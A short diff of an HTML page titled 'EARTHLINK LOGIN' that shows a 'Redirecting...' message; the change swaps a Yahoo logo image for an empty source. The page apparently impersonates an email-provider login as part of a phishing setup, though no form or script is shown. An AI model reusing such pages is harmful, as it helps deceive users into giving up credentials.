--- a/f-cw12.html
+++ b/f-cw12.html
@@ -6,7 +6,7 @@
 </head>
 <P>EARTHLINK LOGIN
 <body>
-<img src="https://s.yimg.com/rz/p/yahoo_homepage_en-US_s_f_p_bestfit_homepage.png">
+<img src="">
 <p>EARTHLINK LOGIN. PLEASE WAIT... Redirecting...</p>
 </body>
 </html>
